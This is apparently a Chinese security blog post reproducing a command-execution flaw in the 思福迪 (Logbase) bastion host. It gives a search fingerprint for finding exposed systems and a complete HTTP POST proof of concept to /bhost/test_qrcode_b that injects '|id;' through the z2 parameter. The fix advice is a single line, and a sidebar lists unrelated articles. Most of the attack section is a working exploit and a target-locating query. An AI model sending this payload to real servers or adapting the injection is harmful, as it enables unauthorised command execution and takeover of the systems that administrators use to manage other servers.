思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机

漏洞描述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器

资产测绘

banner=“Set-Cookie: bhost=” || header=“Set-Cookie: bhost=”
在这里插入图片描述

漏洞复现

POC如下:

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: close

z1=1&z2="|id;"&z3=bhost

在这里插入图片描述

修复建议

厂商已发布了漏洞修复程序,请及时关注更新
http://www.logbase.cn/

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-30 07:28:03       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-30 07:28:03       106 阅读
  3. 在Django里面运行非项目文件

    2023-12-30 07:28:03       87 阅读
  4. Python语言-面向对象

    2023-12-30 07:28:03       96 阅读

热门阅读

  1. dCardAlarmController required a single bean, but 2 were found:

    2023-12-30 07:28:03       59 阅读
  2. Kotlin基础语法

    2023-12-30 07:28:03       51 阅读
  3. 在Python中使用列表推导式List Comprehension的8个层次

    2023-12-30 07:28:03       61 阅读
  4. LeetCode 88. 合并两个有序数组

    2023-12-30 07:28:03       59 阅读
  5. Vuex介绍2

    2023-12-30 07:28:03       61 阅读
  6. 用轻量级ORM--Dapper调用MySQL存储过程

    2023-12-30 07:28:03       74 阅读
  7. Python requests get和post方法发送HTTP请求

    2023-12-30 07:28:03       65 阅读
  8. 建造型设计模式-建造者模式

    2023-12-30 07:28:03       65 阅读
  9. 八股文打卡day14——计算机网络(14)

    2023-12-30 07:28:03       65 阅读
  10. 【DPDK 】dpdk测试发udp包

    2023-12-30 07:28:03       65 阅读
  11. API 安全设计的建议

    2023-12-30 07:28:03       51 阅读
  12. Web常用的编码和解码技术

    2023-12-30 07:28:03       67 阅读